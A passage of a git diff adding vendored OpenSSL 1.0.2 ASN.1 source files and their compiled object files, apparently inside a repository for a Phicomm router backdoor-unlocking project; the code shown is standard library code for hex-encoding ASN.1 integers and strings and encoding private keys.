+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/asn1.h>
+
+int i2a_ASN1_INTEGER(BIO *bp, ASN1_INTEGER *a)
+{
+    int i, n = 0;
+    static const char *h = "0123456789ABCDEF";
+    char buf[2];
+
+    if (a == NULL)
+        return (0);
+
+    if (a->type & V_ASN1_NEG) {
+        if (BIO_write(bp, "-", 1) != 1)
+            goto err;
+        n = 1;
+    }
+
+    if (a->length == 0) {
+        if (BIO_write(bp, "00", 2) != 2)
+            goto err;
+        n += 2;
+    } else {
+        for (i = 0; i < a->length; i++) {
+            if ((i != 0) && (i % 35 == 0)) {
+                if (BIO_write(bp, "\\\n", 2) != 2)
+                    goto err;
+                n += 2;
+            }
+            buf[0] = h[((unsigned char)a->data[i] >> 4) & 0x0f];
+            buf[1] = h[((unsigned char)a->data[i]) & 0x0f];
+            if (BIO_write(bp, buf, 2) != 2)
+                goto err;
+            n += 2;
+        }
+    }
+    return (n);
+ err:
+    return (-1);
+}
+
+int a2i_ASN1_INTEGER(BIO *bp, ASN1_INTEGER *bs, char *buf, int size)
+{
+    int ret = 0;
+    int i, j, k, m, n, again, bufsize;
+    unsigned char *s = NULL, *sp;
+    unsigned char *bufp;
+    int num = 0, slen = 0, first = 1;
+
+    bs->type = V_ASN1_INTEGER;
+
+    bufsize = BIO_gets(bp, buf, size);
+    for (;;) {
+        if (bufsize < 1)
+            goto err_sl;
+        i = bufsize;
+        if (buf[i - 1] == '\n')
+            buf[--i] = '\0';
+        if (i == 0)
+            goto err_sl;
+        if (buf[i - 1] == '\r')
+            buf[--i] = '\0';
+        if (i == 0)
+            goto err_sl;
+        again = (buf[i - 1] == '\\');
+
+        for (j = 0; j < i; j++) {
+#ifndef CHARSET_EBCDIC
+            if (!(((buf[j] >= '0') && (buf[j] <= '9')) ||
+                  ((buf[j] >= 'a') && (buf[j] <= 'f')) ||
+                  ((buf[j] >= 'A') && (buf[j] <= 'F'))))
+#else
+            /*
+             * This #ifdef is not strictly necessary, since the characters
+             * A...F a...f 0...9 are contiguous (yes, even in EBCDIC - but
+             * not the whole alphabet). Nevertheless, isxdigit() is faster.
+             */
+            if (!isxdigit(buf[j]))
+#endif
+            {
+                i = j;
+                break;
+            }
+        }
+        buf[i] = '\0';
+        /*
+         * We have now cleared all the crap off the end of the line
+         */
+        if (i < 2)
+            goto err_sl;
+
+        bufp = (unsigned char *)buf;
+        if (first) {
+            first = 0;
+            if ((bufp[0] == '0') && (buf[1] == '0')) {
+                bufp += 2;
+                i -= 2;
+            }
+        }
+        k = 0;
+        i -= again;
+        if (i % 2 != 0) {
+            ASN1err(ASN1_F_A2I_ASN1_INTEGER, ASN1_R_ODD_NUMBER_OF_CHARS);
+            goto err;
+        }
+        i /= 2;
+        if (num + i > slen) {
+            if (s == NULL)
+                sp = (unsigned char *)OPENSSL_malloc((unsigned int)num +
+                                                     i * 2);
+            else
+                sp = OPENSSL_realloc_clean(s, slen, num + i * 2);
+            if (sp == NULL) {
+                ASN1err(ASN1_F_A2I_ASN1_INTEGER, ERR_R_MALLOC_FAILURE);
+                if (s != NULL)
+                    OPENSSL_free(s);
+                goto err;
+            }
+            s = sp;
+            slen = num + i * 2;
+        }
+        for (j = 0; j < i; j++, k += 2) {
+            for (n = 0; n < 2; n++) {
+                m = bufp[k + n];
+                if ((m >= '0') && (m <= '9'))
+                    m -= '0';
+                else if ((m >= 'a') && (m <= 'f'))
+                    m = m - 'a' + 10;
+                else if ((m >= 'A') && (m <= 'F'))
+                    m = m - 'A' + 10;
+                else {
+                    ASN1err(ASN1_F_A2I_ASN1_INTEGER,
+                            ASN1_R_NON_HEX_CHARACTERS);
+                    goto err;
+                }
+                s[num + j] <<= 4;
+                s[num + j] |= m;
+            }
+        }
+        num += i;
+        if (again)
+            bufsize = BIO_gets(bp, buf, size);
+        else
+            break;
+    }
+    bs->length = num;
+    bs->data = s;
+    ret = 1;
+ err:
+    if (0) {
+ err_sl:
+        ASN1err(ASN1_F_A2I_ASN1_INTEGER, ASN1_R_SHORT_LINE);
+    }
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_int.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_int.o
new file mode 100644
index 0000000000000000000000000000000000000000..fab3832f90419bab0842862a185997957bacae1a
GIT binary patch
literal 3560
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
BkqiI;

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_string.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_string.c
new file mode 100644
index 0000000..6a6cf34
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_string.c
@@ -0,0 +1,209 @@
+/* crypto/asn1/f_string.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/asn1.h>
+
+int i2a_ASN1_STRING(BIO *bp, ASN1_STRING *a, int type)
+{
+    int i, n = 0;
+    static const char *h = "0123456789ABCDEF";
+    char buf[2];
+
+    if (a == NULL)
+        return (0);
+
+    if (a->length == 0) {
+        if (BIO_write(bp, "0", 1) != 1)
+            goto err;
+        n = 1;
+    } else {
+        for (i = 0; i < a->length; i++) {
+            if ((i != 0) && (i % 35 == 0)) {
+                if (BIO_write(bp, "\\\n", 2) != 2)
+                    goto err;
+                n += 2;
+            }
+            buf[0] = h[((unsigned char)a->data[i] >> 4) & 0x0f];
+            buf[1] = h[((unsigned char)a->data[i]) & 0x0f];
+            if (BIO_write(bp, buf, 2) != 2)
+                goto err;
+            n += 2;
+        }
+    }
+    return (n);
+ err:
+    return (-1);
+}
+
+int a2i_ASN1_STRING(BIO *bp, ASN1_STRING *bs, char *buf, int size)
+{
+    int ret = 0;
+    int i, j, k, m, n, again, bufsize;
+    unsigned char *s = NULL, *sp;
+    unsigned char *bufp;
+    int num = 0, slen = 0, first = 1;
+
+    bufsize = BIO_gets(bp, buf, size);
+    for (;;) {
+        if (bufsize < 1) {
+            if (first)
+                break;
+            else
+                goto err_sl;
+        }
+        first = 0;
+
+        i = bufsize;
+        if (buf[i - 1] == '\n')
+            buf[--i] = '\0';
+        if (i == 0)
+            goto err_sl;
+        if (buf[i - 1] == '\r')
+            buf[--i] = '\0';
+        if (i == 0)
+            goto err_sl;
+        again = (buf[i - 1] == '\\');
+
+        for (j = i - 1; j > 0; j--) {
+#ifndef CHARSET_EBCDIC
+            if (!(((buf[j] >= '0') && (buf[j] <= '9')) ||
+                  ((buf[j] >= 'a') && (buf[j] <= 'f')) ||
+                  ((buf[j] >= 'A') && (buf[j] <= 'F'))))
+#else
+            /*
+             * This #ifdef is not strictly necessary, since the characters
+             * A...F a...f 0...9 are contiguous (yes, even in EBCDIC - but
+             * not the whole alphabet). Nevertheless, isxdigit() is faster.
+             */
+            if (!isxdigit(buf[j]))
+#endif
+            {
+                i = j;
+                break;
+            }
+        }
+        buf[i] = '\0';
+        /*
+         * We have now cleared all the crap off the end of the line
+         */
+        if (i < 2)
+            goto err_sl;
+
+        bufp = (unsigned char *)buf;
+
+        k = 0;
+        i -= again;
+        if (i % 2 != 0) {
+            ASN1err(ASN1_F_A2I_ASN1_STRING, ASN1_R_ODD_NUMBER_OF_CHARS);
+            goto err;
+        }
+        i /= 2;
+        if (num + i > slen) {
+            if (s == NULL)
+                sp = (unsigned char *)OPENSSL_malloc((unsigned int)num +
+                                                     i * 2);
+            else
+                sp = (unsigned char *)OPENSSL_realloc(s,
+                                                      (unsigned int)num +
+                                                      i * 2);
+            if (sp == NULL) {
+                ASN1err(ASN1_F_A2I_ASN1_STRING, ERR_R_MALLOC_FAILURE);
+                if (s != NULL)
+                    OPENSSL_free(s);
+                goto err;
+            }
+            s = sp;
+            slen = num + i * 2;
+        }
+        for (j = 0; j < i; j++, k += 2) {
+            for (n = 0; n < 2; n++) {
+                m = bufp[k + n];
+                if ((m >= '0') && (m <= '9'))
+                    m -= '0';
+                else if ((m >= 'a') && (m <= 'f'))
+                    m = m - 'a' + 10;
+                else if ((m >= 'A') && (m <= 'F'))
+                    m = m - 'A' + 10;
+                else {
+                    ASN1err(ASN1_F_A2I_ASN1_STRING,
+                            ASN1_R_NON_HEX_CHARACTERS);
+                    goto err;
+                }
+                s[num + j] <<= 4;
+                s[num + j] |= m;
+            }
+        }
+        num += i;
+        if (again)
+            bufsize = BIO_gets(bp, buf, size);
+        else
+            break;
+    }
+    bs->length = num;
+    bs->data = s;
+    ret = 1;
+ err:
+    if (0) {
+ err_sl:
+        ASN1err(ASN1_F_A2I_ASN1_STRING, ASN1_R_SHORT_LINE);
+    }
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_string.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/f_string.o
new file mode 100644
index 0000000000000000000000000000000000000000..43c098571ef1f13f5d2b4e75ac90b918abcb5815
GIT binary patch
literal 3392
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
M|ANsO*4h6507HskY5)KL

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/i2d_pr.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/i2d_pr.c
new file mode 100644
index 0000000..4d338ac
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/i2d_pr.c
@@ -0,0 +1,78 @@
+/* crypto/asn1/i2d_pr.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include "asn1_locl.h"
+
+int i2d_PrivateKey(EVP_PKEY *a, unsigned char **pp)
+{
+    if (a->ameth && a->ameth->old_priv_encode) {
+        return a->ameth->old_priv_encode(a, pp);
+    }
+    if (a->ameth && a->ameth->priv_encode) {
+        PKCS8_PRIV_KEY_INFO *p8 = EVP_PKEY2PKCS8(a);
+        int ret = i2d_PKCS8_PRIV_KEY_INFO(p8, pp);
+        PKCS8_PRIV_KEY_INFO_free(p8);
+        return ret;
+    }
+    ASN1err(ASN1_F_I2D_PRIVATEKEY, ASN1_R_UNSUPPORTED_PUBLIC_KEY_TYPE);
+    return (-1);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/i2d_pr.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/i2d_pr.o
new file mode 100644
index 0000000000000000000000000000000000000000..f33c3d03fd819457cedd1c4309b2550d5a10b0f6
GIT binary patch
literal 1888
zcmbu9&ubGw6vtnZYGZ%IRXivyl0)$a+BJ!SwTF_X-DGP+8`2-pLs>WNYKzSeHWO(J
z>LFAJx%BAWgIABG2Q8?mSN{Y-5EMkbi4fnLooP4g=AsYYzVG|YyqV4Hn>^OC>0lrL
z(gH9BN13Dm(XJz%<T45U&<8(Hp8vI=*S{%xGo$D`2P~~OclU6DzVnfF>-9Iva_f^`
z-_${Gu%R%!_=Sq~CThL$R&Ts>^2YbZ<WQLFCW^0vTKpjXVgEVKefbO@uln)9hwJZK
zeAU;GnV1-jURo&BN~{*WrCwKK!||Inp2i;~VruNhWd~y^(CaJc$Ivq~3lIc2AQnO=
zJL3chZ08}csRRc4y2HD85Lb~8im`2qT10sgoQy=5dLqhrB%JCE&T%2;bP9B)UGSsj
zHy-jmae6oTcI{Om{%hJ9Wg$5JH{`s#0}prLbV}{kgXwA4d-AhDb`G7+)oa%f`0=q0
ze6a&Bci^y|ST!oPy23@yUVmURYuefZBa@v?jc1M7bb3ykH|EDvS<L`#F=ynawWUOE
zdSY(GsUc<L@>7cj4j5B2=~>{T?aa7qTNY^fyiut!!?NwNjjsd=dZ1Ac^`if7IhG=b
zM!XMQ@)?3?#Hp7hFA_u}9zmBpikb}jlsix8p;otw%q(DJwiDN+vaJnMW!5GGb=71h
zsD)}3)Rl6vXqAwa%FI%+_lK*@T)8jud!?FMvC9?9W?P{06|6P<&1TU$-12`!6pN|%
zy`7mvMkf2n$(*@TQyf62vq_@6ZA4s+I|5RF(mt}I&kBA)aPLjp7vtVQYq*W>Kdt$%
z^>M7FHDl;*llxzBL)3DA8An~rJ@vCYacNm6(QOoT`>BuI#{WwZMBNazJU@vGC}>S@
zeOPRy%ZVa->z9%HeZQyTK;?I$??<(=UUI*^X{(&re@#TXgC~6IiFv;rBG?l@=piL8
V6U!ZvQ>gsvUkJEyIMWf{`aim=zeoT8

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/i2d_pu.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/i2d_pu.c
new file mode 100644
index 0000000..b8ed355
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/i2d_pu.c
@@ -0,0 +1,93 @@
+/* crypto/asn1/i2d_pu.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
